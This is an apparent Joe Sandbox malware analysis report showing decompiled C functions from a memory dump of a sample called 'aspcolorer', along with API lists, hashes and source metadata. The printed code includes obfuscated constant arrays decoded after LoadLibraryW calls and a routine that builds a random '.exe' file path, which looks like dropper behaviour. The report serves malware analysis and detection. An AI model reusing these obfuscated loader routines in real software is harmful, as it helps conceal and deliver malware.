				 *((intOrPtr*)(_t134 - 0x1a8)) = 0x8f8c8696;
				 *((intOrPtr*)(_t134 - 0x1a4)) = 0xf4310161;
				 *((intOrPtr*)(_t134 - 0x1a0)) = 0xbdfb7a1c;
				 *((intOrPtr*)(_t134 - 0x19c)) = 0x689fcb1d;
				 *((intOrPtr*)(_t134 - 0x198)) = 0xeba259e;
				 *((intOrPtr*)(_t134 - 0x194)) = 0x38ee263f;
				 *((intOrPtr*)(_t134 - 0x190)) = 0x256c946a;
				 *((intOrPtr*)(_t134 - 0x18c)) = 0xffeff022;
				 *((intOrPtr*)(_t134 - 0x188)) = 0x9e808a8b;
				 *((intOrPtr*)(_t134 - 0x184)) = 0x5d53a508;
				 *((intOrPtr*)(_t134 - 0x180)) = 0xad6c0f5e;
				 *((intOrPtr*)(_t134 - 0x17c)) = 0x414247c0;
				 *((intOrPtr*)(_t134 - 0x178)) = 0x9008ab13;
				 *((intOrPtr*)(_t134 - 0x174)) = 0xe58dfa82;
				 *((intOrPtr*)(_t134 - 0x170)) = 0x7c74d2d9;
				 *((intOrPtr*)(_t134 - 0x16c)) = 0x5b2abf08;
				 *((intOrPtr*)(_t134 - 0x168)) = 0xa90e9b61;
				 *((intOrPtr*)(_t134 - 0x164)) = 0x5bd4abca;
				 *((intOrPtr*)(_t134 - 0x160)) = 0x39c4aaea;
				 *((intOrPtr*)(_t134 - 0x15c)) = 0xef5958f8;
				 *((intOrPtr*)(_t134 - 0x158)) = 0xa340f289;
				 *((intOrPtr*)(_t134 - 0x154)) = 0x8491f536;
				 *((intOrPtr*)(_t134 - 0x150)) = 0xd0075d38;
				 *((intOrPtr*)(_t134 - 0x14c)) = 0xbb78a1bb;
				 *((intOrPtr*)(_t134 - 0x148)) = 0xab8a0c45;
				 *((intOrPtr*)(_t134 - 0x144)) = 0x6ef79686;
				 *((intOrPtr*)(_t134 - 0x140)) = 0x19edad06;
				 *((intOrPtr*)(_t134 - 0x13c)) = 0xacef0ee1;
				 *((intOrPtr*)(_t134 - 0x138)) = 0x3c058933;
				 *((intOrPtr*)(_t134 - 0x134)) = 0x18f1a4e2;
				 *((intOrPtr*)(_t134 - 0x130)) = 0xaa13281f;
				 *((intOrPtr*)(_t134 - 0x12c)) = 0x583b2eb0;
				 *((intOrPtr*)(_t134 - 0x128)) = 0xec8f2b60;
				 *((intOrPtr*)(_t134 - 0x124)) = 0xec8d9903;
				 *((intOrPtr*)(_t134 - 0x120)) = 0xd7db8dc;
				 *((intOrPtr*)(_t134 - 0x11c)) = 0xde0081ab;
				 *((intOrPtr*)(_t134 - 0x118)) = 0xd3285a3d;
				 *((intOrPtr*)(_t134 - 0x114)) = 0x76547dd1;
				 *((intOrPtr*)(_t134 - 0x110)) = 0xc9973301;
				 *((intOrPtr*)(_t134 - 0x10c)) = 0xf3e799b2;
				 *((intOrPtr*)(_t134 - 0x108)) = 0xa0930d6d;
				 *((intOrPtr*)(_t134 - 0x104)) = 0x8ba414d3;
				 *((intOrPtr*)(_t134 - 0x100)) = 0xd6c986dc;
				 *((intOrPtr*)(_t134 - 0xfc)) = 0x2dbaa1c7;
				 *((intOrPtr*)(_t134 - 0xf8)) = 0x4d5196f1;
				 *((intOrPtr*)(_t134 - 0xf4)) = 0x532e1a94;
				 *((intOrPtr*)(_t134 - 0xf0)) = 0xc29f0e71;
				 *((intOrPtr*)(_t134 - 0xec)) = 0x82d9cbd7;
				 *((intOrPtr*)(_t134 - 0xe8)) = 0x8d2e702f;
				 *((intOrPtr*)(_t134 - 0xe4)) = 0x3cd1c507;
				 *((intOrPtr*)(_t134 - 0xe0)) = 0xf7297813;
				 *((intOrPtr*)(_t134 - 0xdc)) = 0x9f0cbb3c;
				 *((intOrPtr*)(_t134 - 0xd8)) = 0x134fd2a2;
				 *((intOrPtr*)(_t134 - 0xd4)) = 0x57f52550;
				 *((intOrPtr*)(_t134 - 0xd0)) = 0x43f75c28;
				 *((intOrPtr*)(_t134 - 0xcc)) = 0xc089cb77;
				 *((intOrPtr*)(_t134 - 0xc8)) = 0xa6937a45;
				 *((intOrPtr*)(_t134 - 0xc4)) = 0x126a0187;
				 *((intOrPtr*)(_t134 - 0xc0)) = 0xc08e4772;
				 *((intOrPtr*)(_t134 - 0xbc)) = 0xb217e0af;
				 *((intOrPtr*)(_t134 - 0xb8)) = 0x5b1c3383;
				 *((intOrPtr*)(_t134 - 0xb4)) = 0xe12b96ee;
				 *((intOrPtr*)(_t134 - 0xb0)) = 0x9a5eaa8f;
				 *((intOrPtr*)(_t134 - 0xac)) = 0xda1cc80;
				 *((intOrPtr*)(_t134 - 0xa8)) = 0x2d1c74f2;
				 *((intOrPtr*)(_t134 - 0xa4)) = 0xc41fd3d1;
				 *((intOrPtr*)(_t134 - 0xa0)) = 0x1c906283;
				 *((intOrPtr*)(_t134 - 0x9c)) = 0xe89d7a5b;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t134 - 0x98)) = 0xfa215643;
				 *((intOrPtr*)(_t134 - 0x94)) = 0xf6acfd24;
				 *((intOrPtr*)(_t134 - 0x90)) = 0xac7b5ae9;
				 *((intOrPtr*)(_t134 - 0x8c)) = 0x27b06b67;
				 *((intOrPtr*)(_t134 - 0x88)) = 0x70ca03fb;
				 *((intOrPtr*)(_t134 - 0x84)) = 0x526e9be0;
				 *((intOrPtr*)(_t134 - 0x80)) = 0xb7d2bed9;
				 *((intOrPtr*)(_t134 - 0x7c)) = 0xe8859b5e;
				 *((intOrPtr*)(_t134 - 0x78)) = 0xc759a22d;
				 *((intOrPtr*)(_t134 - 0x74)) = 0x3d0f084e;
				 *((intOrPtr*)(_t134 - 0x70)) = 0x3899d01a;
				 *((intOrPtr*)(_t134 - 0x6c)) = 0x1bac7a28;
				 *((intOrPtr*)(_t134 - 0x68)) = 0x5de6e4cd;
				 *((intOrPtr*)(_t134 - 0x64)) = 0x9e6bbd4;
				 *((intOrPtr*)(_t134 - 0x60)) = 0x7ce5cce6;
				 *((intOrPtr*)(_t134 - 0x5c)) = 0x480d6679;
				 *((intOrPtr*)(_t134 - 0x58)) = 0x2b5c73dd;
				 *((intOrPtr*)(_t134 - 0x54)) = 0x84318722;
				 *((intOrPtr*)(_t134 - 0x50)) = 0xb8503dd2;
				 *((intOrPtr*)(_t134 - 0x4c)) = 0x221dcfb0;
				 *((intOrPtr*)(_t134 - 0x48)) = 0xdc8b90d0;
				 *((intOrPtr*)(_t134 - 0x44)) = 0xc485ac00;
				 *((intOrPtr*)(_t134 - 0x40)) = 0x973c44ba;
				 *((intOrPtr*)(_t134 - 0x3c)) = 0x5e64f4f2;
				 *((intOrPtr*)(_t134 - 0x38)) = 0x4c2f3f10;
				 *((intOrPtr*)(_t134 - 0x34)) = 0xc23384f2;
				 *((intOrPtr*)(_t134 - 0x30)) = 0x31cd6972;
				 *((intOrPtr*)(_t134 - 0x2c)) = 0x8d571f10;
				 *((intOrPtr*)(_t134 - 0x28)) = 0xc26f54e0;
				 *((intOrPtr*)(_t134 - 0x24)) = 0x99b23930;
				 *((intOrPtr*)(_t134 - 0x20)) = 0x66df1800;
				 *((intOrPtr*)(_t134 - 0x1c)) = 0x4a273656;
				 *((intOrPtr*)(_t134 - 0x18)) = 0xa4faed2a;
				 *((intOrPtr*)(_t134 - 0x14)) = 0x92050cdc;
				 *((intOrPtr*)(_t134 - 0x10)) = 0xc00e3cbd;
				 *((intOrPtr*)(_t134 - 0xc)) = 0x83733fff;
				 *((intOrPtr*)(_t134 - 8)) = 0x631aa631;
				 *((intOrPtr*)(_t134 - 4)) = 0x169152df;
				_t132 = L02D61D10(0x2d72f70, 0x18, __edi, __esi);
				 *0x2d771d8 = LoadLibraryW(_t120);
				L02D61DB0(_t132);
				return E02D61570(_t124,  *0x2d771d8, _t134 - 0x1d8, _t132, 0x76, 0x5139eb75, 0x2d74040);
			}

0x02d66e3a
0x02d66e3a
0x02d66e44
0x02d66e4e
0x02d66e58
0x02d66e62
0x02d66e6c
0x02d66e76
0x02d66e80
0x02d66e8a
0x02d66e94
0x02d66e9e
0x02d66ea8
0x02d66eb2
0x02d66ebc
0x02d66ec6
0x02d66ed0
0x02d66eda
0x02d66ee4
0x02d66eee
0x02d66ef8
0x02d66f02
0x02d66f0c
0x02d66f16
0x02d66f20
0x02d66f2a
0x02d66f34
0x02d66f3e
0x02d66f48
0x02d66f52
0x02d66f5c
0x02d66f66
0x02d66f70
0x02d66f7a
0x02d66f84
0x02d66f8e
0x02d66f98
0x02d66fa2
0x02d66fac
0x02d66fb6
0x02d66fc0
0x02d66fca
0x02d66fd4
0x02d66fde
0x02d66fe8
0x02d66ff2
0x02d66ffc
0x02d67006
0x02d67010
0x02d6701a
0x02d67024
0x02d6702e
0x02d67038
0x02d67042
0x02d6704c
0x02d67056
0x02d67060
0x02d6706a
0x02d67074
0x02d6707e
0x02d67088
0x02d67092
0x02d6709c
0x02d670a6
0x02d670b0
0x02d670ba
0x02d670c4
0x02d670ce
0x02d670d8
0x02d670e2
0x02d670ec
0x02d670f6
0x02d67100
0x02d6710a
0x02d67114
0x02d6711e
0x02d67128
0x02d67132
0x02d6713c
0x02d67146
0x02d67150
0x02d6715a
0x02d67164
0x02d67173
0x02d6717d
0x02d67187
0x02d67191
0x02d6719b
0x02d671a5
0x02d671ac
0x02d671b3
0x02d671ba
0x02d671c1
0x02d671c8
0x02d671cf
0x02d671d6
0x02d671dd
0x02d671e4
0x02d671eb
0x02d671f2
0x02d671f9
0x02d67200
0x02d67207
0x02d6720e
0x02d67215
0x02d6721c
0x02d67223
0x02d6722a
0x02d67231
0x02d67238
0x02d6723f
0x02d67246
0x02d6724d
0x02d67254
0x02d6725b
0x02d67262
0x02d67269
0x02d67270
0x02d67277
0x02d6727e
0x02d6728d
0x02d67298
0x02d6729d
0x02d672c6

APIs

LoadLibraryW.KERNEL32(00000000), ref: 02D67290

Strings

D, xrefs: 02D66E6C
?&8, xrefs: 02D66EE4
yfH, xrefs: 02D671E4
V6'J, xrefs: 02D67254

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ?&8$V6'J$yfH$D
API String ID: 1029625771-2647291396
Opcode ID: b78e13d3cbc52077e5cb85f0033cba2339f56b9a439aa4abb91e3b09d95fb53a
Instruction ID: 95e64b301d8d1d60b4eccda56d6f4c9f4eb2779821b479d15b4b43a2b912b90d
Opcode Fuzzy Hash: b78e13d3cbc52077e5cb85f0033cba2339f56b9a439aa4abb91e3b09d95fb53a
Instruction Fuzzy Hash: A6A1A7B4C4936C8FEB608F81AA856CDBB71FB12344F6086C8C5693B714DB754A82CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02D6CCB0, Relevance: 7.5, APIs: 5, Instructions: 37
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02D6CCB0(void* __eflags) {
				void* __esi;
				long _t3;
				void* _t4;
				long _t8;
				void* _t10;
				void* _t11;
				void* _t12;
				int _t13;

				_t13 = 0;
				if(L02D6CB90(_t10, _t11, _t12, 0, __eflags) == 0) {
					L9:
					return _t13;
				}
				_t3 = WaitForSingleObject( *0x2d74418, 0);
				if(_t3 == 0) {
					L3:
					_t4 = L02D6CBF0(_t10, _t11, _t12, _t13, _t17);
					_t18 = _t4;
					if(_t4 != 0) {
						if(L02D6CC50(_t10, _t11, _t12, _t13, _t18) != 0) {
							_t8 = SignalObjectAndWait( *0x2d7421c,  *0x2d74218, 0xffffffff, 0);
							if(_t8 == 0 || _t8 == 0x80) {
								_t13 = ResetEvent( *0x2d7421c);
							}
						}
						ReleaseMutex( *0x2d74418);
						CloseHandle( *0x2d74418);
					}
					goto L9;
				}
				_t17 = _t3 - 0x80;
				if(_t3 != 0x80) {
					goto L9;
				}
				goto L3;
			}

0x02d6ccb1
0x02d6ccba
0x02d6cd2d
0x02d6cd30
0x02d6cd30
0x02d6ccc3
0x02d6cccb
0x02d6ccd4
0x02d6ccd4
0x02d6ccd9
0x02d6ccdb
0x02d6cce4
0x02d6ccf6
0x02d6ccfe
0x02d6cd13
0x02d6cd13
0x02d6ccfe
0x02d6cd1b
0x02d6cd27
0x02d6cd27
0x00000000
0x02d6ccdb
0x02d6cccd
0x02d6ccd2
0x00000000
0x00000000
0x00000000

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 02D6CCC3
SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 02D6CCF6
ResetEvent.KERNEL32 ref: 02D6CD0D
ReleaseMutex.KERNEL32 ref: 02D6CD1B
CloseHandle.KERNEL32 ref: 02D6CD27

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: ObjectWait$CloseEventHandleMutexReleaseResetSignalSingle
String ID:
API String ID: 3756552044-0
Opcode ID: 92bd01a2c840da36d8b32c0eccb9f346eee39033b862b8f490a5935ba9e1191b
Instruction ID: a24c376c43178851976ae2f8a9f5e6916c2003177ca24a2d2006d7e83d491bfb
Opcode Fuzzy Hash: 92bd01a2c840da36d8b32c0eccb9f346eee39033b862b8f490a5935ba9e1191b
Instruction Fuzzy Hash: 4CF0E730A901115BDB222B65AD0CB693B76EF04359F164926EA80D13E0FB288C79DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D67C6A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 147
libraryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E02D67C6A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t131;
				void* _t141;

				_t131 = __ebx;
				 *((intOrPtr*)(_t141 - 0x1f4)) = 0xf8bc5878;
				 *((intOrPtr*)(_t141 - 0x1f0)) = 0x79854227;
				 *((intOrPtr*)(_t141 - 0x1ec)) = 0x45766011;
				 *((intOrPtr*)(_t141 - 0x1e8)) = 0xc5ef84f5;
				 *((intOrPtr*)(_t141 - 0x1e4)) = 0x8170e46b;
				 *((intOrPtr*)(_t141 - 0x1e0)) = 0x47be9c88;
				 *((intOrPtr*)(_t141 - 0x1dc)) = 0x65d4b5a8;
				 *((intOrPtr*)(_t141 - 0x1d8)) = 0xa08f779d;
				 *((intOrPtr*)(_t141 - 0x1d4)) = 0x64ba5b3f;
				 *((intOrPtr*)(_t141 - 0x1d0)) = 0xf06ce8a3;
				 *((intOrPtr*)(_t141 - 0x1cc)) = 0xbcc4cdf5;
				 *((intOrPtr*)(_t141 - 0x1c8)) = 0x9f24347e;
				 *((intOrPtr*)(_t141 - 0x1c4)) = 0x824d0a33;
				 *((intOrPtr*)(_t141 - 0x1c0)) = 0x9f346a3a;
				 *((intOrPtr*)(_t141 - 0x1bc)) = 0xc0903b02;
				 *((intOrPtr*)(_t141 - 0x1b8)) = 0xfdcbd5e3;
				 *((intOrPtr*)(_t141 - 0x1b4)) = 0x6ea17253;
				 *((intOrPtr*)(_t141 - 0x1b0)) = 0xd1ad9674;
				 *((intOrPtr*)(_t141 - 0x1ac)) = 0x3dcfa93c;
				 *((intOrPtr*)(_t141 - 0x1a8)) = 0xc96e9958;
				 *((intOrPtr*)(_t141 - 0x1a4)) = 0x75f82e86;
				 *((intOrPtr*)(_t141 - 0x1a0)) = 0x66730c53;
				 *((intOrPtr*)(_t141 - 0x19c)) = 0xa7769c3b;
				 *((intOrPtr*)(_t141 - 0x198)) = 0x44887a47;
				 *((intOrPtr*)(_t141 - 0x194)) = 0x4b63b12d;
				 *((intOrPtr*)(_t141 - 0x190)) = 0x6f3c59ed;
				 *((intOrPtr*)(_t141 - 0x18c)) = 0xba34ab4f;
				 *((intOrPtr*)(_t141 - 0x188)) = 0x7788338f;
				 *((intOrPtr*)(_t141 - 0x184)) = 0xb462f585;
				 *((intOrPtr*)(_t141 - 0x180)) = 0x8a60cb05;
				 *((intOrPtr*)(_t141 - 0x17c)) = 0xab4aa99a;
				 *((intOrPtr*)(_t141 - 0x178)) = 0x60f7e74e;
				 *((intOrPtr*)(_t141 - 0x174)) = 0xa507aa68;
				 *((intOrPtr*)(_t141 - 0x170)) = 0x80a8997e;
				 *((intOrPtr*)(_t141 - 0x16c)) = 0x57be0c33;
				 *((intOrPtr*)(_t141 - 0x168)) = 0xfee474af;
				 *((intOrPtr*)(_t141 - 0x164)) = 0xfb3b3002;
				 *((intOrPtr*)(_t141 - 0x160)) = 0xeec3536b;
				 *((intOrPtr*)(_t141 - 0x15c)) = 0xea0e5964;
				 *((intOrPtr*)(_t141 - 0x158)) = 0x1bbeda24;
				 *((intOrPtr*)(_t141 - 0x154)) = 0x4fce9e0f;
				 *((intOrPtr*)(_t141 - 0x150)) = 0xd88914e2;
				 *((intOrPtr*)(_t141 - 0x14c)) = 0x1cadb6bb;
				 *((intOrPtr*)(_t141 - 0x148)) = 0xb132df34;
				 *((intOrPtr*)(_t141 - 0x144)) = 0xc4459303;
				 *((intOrPtr*)(_t141 - 0x140)) = 0x46584ba5;
				 *((intOrPtr*)(_t141 - 0x13c)) = 0x5317af;
				 *((intOrPtr*)(_t141 - 0x138)) = 0x4b99a86f;
				 *((intOrPtr*)(_t141 - 0x134)) = 0xa24695f7;
				 *((intOrPtr*)(_t141 - 0x130)) = 0xb165285a;
				 *((intOrPtr*)(_t141 - 0x12c)) = 0xd2a3a96b;
				 *((intOrPtr*)(_t141 - 0x128)) = 0xcc478d16;
				 *((intOrPtr*)(_t141 - 0x124)) = 0x1707e491;
				 *((intOrPtr*)(_t141 - 0x120)) = 0x859a6f02;
				 *((intOrPtr*)(_t141 - 0x11c)) = 0xdd8d92e2;
				 *((intOrPtr*)(_t141 - 0x118)) = 0xe794bcf8;
				 *((intOrPtr*)(_t141 - 0x114)) = 0x3b51c1aa;
				 *((intOrPtr*)(_t141 - 0x110)) = 0x86db06e9;
				 *((intOrPtr*)(_t141 - 0x10c)) = 0xfb85d0f3;
				 *((intOrPtr*)(_t141 - 0x108)) = 0x61fbefea;
				 *((intOrPtr*)(_t141 - 0x104)) = 0x26135710;
				 *((intOrPtr*)(_t141 - 0x100)) = 0x4ba589f3;
				 *((intOrPtr*)(_t141 - 0xfc)) = 0x7f22691f;
				 *((intOrPtr*)(_t141 - 0xf8)) = 0xbd62057d;
				 *((intOrPtr*)(_t141 - 0xf4)) = 0x6207d963;
				 *((intOrPtr*)(_t141 - 0xf0)) = 0xcc825023;
				 *((intOrPtr*)(_t141 - 0xec)) = 0x534c78de;
				 *((intOrPtr*)(_t141 - 0xe8)) = 0xb931b9a4;
				 *((intOrPtr*)(_t141 - 0xe4)) = 0x338b18e6;
				 *((intOrPtr*)(_t141 - 0xe0)) = 0x1c7db376;
				 *((intOrPtr*)(_t141 - 0xdc)) = 0x7ad1956d;
				 *((intOrPtr*)(_t141 - 0xd8)) = 0x8a268700;
				 *((intOrPtr*)(_t141 - 0xd4)) = 0xc67ccd3c;
				 *((intOrPtr*)(_t141 - 0xd0)) = 0xe1973f53;
				 *((intOrPtr*)(_t141 - 0xcc)) = 0x7d12a504;
				 *((intOrPtr*)(_t141 - 0xc8)) = 0x8449357d;
				 *((intOrPtr*)(_t141 - 0xc4)) = 0x210531f1;
				 *((intOrPtr*)(_t141 - 0xc0)) = 0xfb57d59;
				 *((intOrPtr*)(_t141 - 0xbc)) = 0x58e4b3ba;
				 *((intOrPtr*)(_t141 - 0xb8)) = 0x979e3b02;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t141 - 0xb4)) = 0x59216394;
				 *((intOrPtr*)(_t141 - 0xb0)) = 0xe9ec070b;
				 *((intOrPtr*)(_t141 - 0xac)) = 0x1d968333;
				 *((intOrPtr*)(_t141 - 0xa8)) = 0xc1991ff1;
				 *((intOrPtr*)(_t141 - 0xa4)) = 0x5c23a8c4;
				 *((intOrPtr*)(_t141 - 0xa0)) = 0x9cf69a1f;
				 *((intOrPtr*)(_t141 - 0x9c)) = 0x2e5cf8a;
				 *((intOrPtr*)(_t141 - 0x98)) = 0xe9583f9c;
				 *((intOrPtr*)(_t141 - 0x94)) = 0xa9a3ca4f;
				 *((intOrPtr*)(_t141 - 0x90)) = 0xe3f82e3c;
				 *((intOrPtr*)(_t141 - 0x8c)) = 0x1626b69f;
				 *((intOrPtr*)(_t141 - 0x88)) = 0x7c3a6172;
				 *((intOrPtr*)(_t141 - 0x84)) = 0xe1ab4a9e;
				 *((intOrPtr*)(_t141 - 0x80)) = 0x477f6349;
				 *((intOrPtr*)(_t141 - 0x7c)) = 0xb497fc7e;
				 *((intOrPtr*)(_t141 - 0x78)) = 0x262ee3f1;
				 *((intOrPtr*)(_t141 - 0x74)) = 0x6f16f92b;
				 *((intOrPtr*)(_t141 - 0x70)) = 0x131bd118;
				 *((intOrPtr*)(_t141 - 0x6c)) = 0x98eaf895;
				 *((intOrPtr*)(_t141 - 0x68)) = 0x6aa6ef29;
				 *((intOrPtr*)(_t141 - 0x64)) = 0x5a6620f5;
				 *((intOrPtr*)(_t141 - 0x60)) = 0x7a53ec17;
				 *((intOrPtr*)(_t141 - 0x5c)) = 0x9893970d;
				 *((intOrPtr*)(_t141 - 0x58)) = 0xbd0b2170;
				 *((intOrPtr*)(_t141 - 0x54)) = 0xb31f2ee7;
				 *((intOrPtr*)(_t141 - 0x50)) = 0xf25afd91;
				 *((intOrPtr*)(_t141 - 0x4c)) = 0x2864793a;
				 *((intOrPtr*)(_t141 - 0x48)) = 0x9e20faa;
				 *((intOrPtr*)(_t141 - 0x44)) = 0x1b3c84a3;
				 *((intOrPtr*)(_t141 - 0x40)) = 0x96f0b6e;
				 *((intOrPtr*)(_t141 - 0x3c)) = 0xe14ba772;
				 *((intOrPtr*)(_t141 - 0x38)) = 0xc00ca76f;
				 *((intOrPtr*)(_t141 - 0x34)) = 0xecbbc305;
				 *((intOrPtr*)(_t141 - 0x30)) = 0xe1924f16;
				 *((intOrPtr*)(_t141 - 0x2c)) = 0x4c76fddd;
				 *((intOrPtr*)(_t141 - 0x28)) = 0x1fefe41e;
				 *((intOrPtr*)(_t141 - 0x24)) = 0xfe379b1c;
				 *((intOrPtr*)(_t141 - 0x20)) = 0x38a6ab12;
				 *((intOrPtr*)(_t141 - 0x1c)) = 0xdee6ced2;
				 *((intOrPtr*)(_t141 - 0x18)) = 0x5d98300b;
				 *((intOrPtr*)(_t141 - 0x14)) = 0xd971e302;
				 *((intOrPtr*)(_t141 - 0x10)) = 0x2d135426;
				 *((intOrPtr*)(_t141 - 0xc)) = 0xf84208f;
				 *((intOrPtr*)(_t141 - 8)) = 0xa4538f2a;
				 *((intOrPtr*)(_t141 - 4)) = 0x33da5190;
				_t139 = L02D61D10(0x2d72e20, 0x150, __edi, __esi);
				 *0x2d771e0 = LoadLibraryW(_t127);
				L02D61DB0(_t139);
				return E02D61570(_t131,  *0x2d771e0, _t141 - 0x1f4, _t139, 0x7d, 0x1dc051b6, 0x2d74220);
			}

0x02d67c6a
0x02d67c6a
0x02d67c74
0x02d67c7e
0x02d67c88
0x02d67c92
0x02d67c9c
0x02d67ca6
0x02d67cb0
0x02d67cba
0x02d67cc4
0x02d67cce
0x02d67cd8
0x02d67ce2
0x02d67cec
0x02d67cf6
0x02d67d00
0x02d67d0a
0x02d67d14
0x02d67d1e
0x02d67d28
0x02d67d32
0x02d67d3c
0x02d67d46
0x02d67d50
0x02d67d5a
0x02d67d64
0x02d67d6e
0x02d67d78
0x02d67d82
0x02d67d8c
0x02d67d96
0x02d67da0
0x02d67daa
0x02d67db4
0x02d67dbe
0x02d67dc8
0x02d67dd2
0x02d67ddc
0x02d67de6
0x02d67df0
0x02d67dfa
0x02d67e04
0x02d67e0e
0x02d67e18
0x02d67e22
0x02d67e2c
0x02d67e36
0x02d67e40
0x02d67e4a
0x02d67e54
0x02d67e5e
0x02d67e68
0x02d67e72
0x02d67e7c
0x02d67e86
0x02d67e90
0x02d67e9a
0x02d67ea4
0x02d67eae
0x02d67eb8
0x02d67ec2
0x02d67ecc
0x02d67ed6
0x02d67ee0
0x02d67eea
0x02d67ef4
0x02d67efe
0x02d67f08
0x02d67f12
0x02d67f1c
0x02d67f26
0x02d67f30
0x02d67f3a
0x02d67f44
0x02d67f4e
0x02d67f58
0x02d67f62
0x02d67f6c
0x02d67f76
0x02d67f80
0x02d67f8a
0x02d67f94
0x02d67fa3
0x02d67fad
0x02d67fb7
0x02d67fc1
0x02d67fcb
0x02d67fd5
0x02d67fdf
0x02d67fe9
0x02d67ff3
0x02d67ffd
0x02d68007
0x02d68011
0x02d6801b
0x02d68022
0x02d68029
0x02d68030
0x02d68037
0x02d6803e
0x02d68045
0x02d6804c
0x02d68053
0x02d6805a
0x02d68061
0x02d68068
0x02d6806f
0x02d68076
0x02d6807d
0x02d68084
0x02d6808b
0x02d68092
0x02d68099
0x02d680a0
0x02d680a7
0x02d680ae
0x02d680b5
0x02d680bc
0x02d680c3
0x02d680ca
0x02d680d1
0x02d680d8
0x02d680df
0x02d680e6
0x02d680ed
0x02d680f4
0x02d68103
0x02d6810e
0x02d68113
0x02d6813c

APIs

LoadLibraryW.KERNEL32(00000000), ref: 02D68106

Strings

:yd(, xrefs: 02D68076
ra:|, xrefs: 02D68007
Y<o, xrefs: 02D67D64

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: :yd($ra:|$Y<o
API String ID: 1029625771-1249044168
Opcode ID: 04f6f77ff4708a22615b3f95d03b37f68d4279d8e8354426bb22dcc1123a6710
Instruction ID: b7a1a935f511c57c148e8dbacee7ce7eb182d6b23f47be6c71523cd3245df1b1
Opcode Fuzzy Hash: 04f6f77ff4708a22615b3f95d03b37f68d4279d8e8354426bb22dcc1123a6710
Instruction Fuzzy Hash: 93B1B7B4C49369DBDB20CF829A817DDBA71FB16300F6085C8C5993B315DB740A86CF96

Uniqueness

Uniqueness Score: -1.00%

Function 02D6FA30, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02D6FA30(WCHAR* __ecx) {
				WCHAR* _t19;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t28;

				_t19 = __ecx;
				lstrcpyW(__ecx, 0x2d77748);
				_t23 = lstrlenW(_t19);
				_t19[_t23] = 0x5c;
				_t24 = _t23 + 1;
				_t28 = (GetTickCount() & 0x0000000f) + 4;
				L02D621E0( &(_t19[_t24]), _t28);
				_t25 = _t24 + _t28;
				_t19[_t25] = 0x65002e;
				 *((intOrPtr*)(_t19 + 4 + _t25 * 2)) = 0x650078;
				 *((short*)(_t19 + 8 + _t25 * 2)) = 0;
				return 0;
			}

0x02d6fa33
0x02d6fa3b
0x02d6fa48
0x02d6fa4f
0x02d6fa53
0x02d6fa62
0x02d6fa67
0x02d6fa6c
0x02d6fa70
0x02d6fa77
0x02d6fa7f
0x02d6fa87

APIs

lstrcpyW.KERNEL32(?,02D77748), ref: 02D6FA3B
lstrlenW.KERNEL32(?,?,02D77748), ref: 02D6FA42
GetTickCount.KERNEL32 ref: 02D6FA54

Strings

x, xrefs: 02D6FA77

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: CountTicklstrcpylstrlen
String ID: x
API String ID: 974621299-2363233923
Opcode ID: 0cdfea7e4f36ad24148cd2a2e502ed91c67291ef912dd826bd442bab0a34bd51
Instruction ID: f5d62b65d8985a69a807c51d4943bfa69fba274c6f2a9e85d650b8af46b48be4
Opcode Fuzzy Hash: 0cdfea7e4f36ad24148cd2a2e502ed91c67291ef912dd826bd442bab0a34bd51
Instruction Fuzzy Hash: E9F0E5B7A45359ABE7115FA0ECC854637A9EF44362B055475EC06DB306EF78CC1887E0

Uniqueness

Uniqueness Score: -1.00%

Function 02D6D119, Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 02D6D119
GetTickCount.KERNEL32 ref: 02D6D127
GetTickCount.KERNEL32 ref: 02D6D138
WaitForSingleObject.KERNEL32(00000000,?,00000000), ref: 02D6D18C

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

